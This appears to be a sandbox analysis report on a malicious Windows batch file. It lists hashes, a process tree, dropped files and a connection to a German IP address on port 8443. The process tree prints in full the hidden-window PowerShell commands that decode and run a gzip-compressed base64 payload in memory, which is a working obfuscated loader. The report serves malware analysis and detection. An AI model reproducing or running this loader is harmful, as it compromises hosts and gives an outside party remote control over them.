File name: | 123.bat |
Full analysis: | https://app.any.run/tasks/bd1473e6-7800-4e2c-ad51-13113ee6f61a |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 08:24:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | C8BBA730C977B6A0A00C2FC0CE0C0CD5 |
SHA1: | 1CFB2E8DFFFC341FACB4C18D535B3F107CEE0B0B |
SHA256: | 3C251349B7733B4C9893526870BA8295403C96719E2C8CF413DB40569A4C04AC |
SSDEEP: | 48:dVIaWMaMUc6/2rcmilWrSsquUFlPvoRV1mSTXDjDeRpsQ3S4CKCVVYWX:tSlIcZ/kkhg1mS7DjiRptTbC7Yq |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3124 | cmd /c ""C:\Users\admin\AppData\Local\Temp\123.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3924 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2256 | "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BUPOU0DIPIKMNWH2MYV0.temp | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A6SHM723XT31NM74BPPX.temp | — | |
MD5:— | SHA256:— | |||
3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ebcb.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e90c.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2256 | powershell.exe | 89.144.25.94:8443 | — | GHOSTnet GmbH | DE | unknown |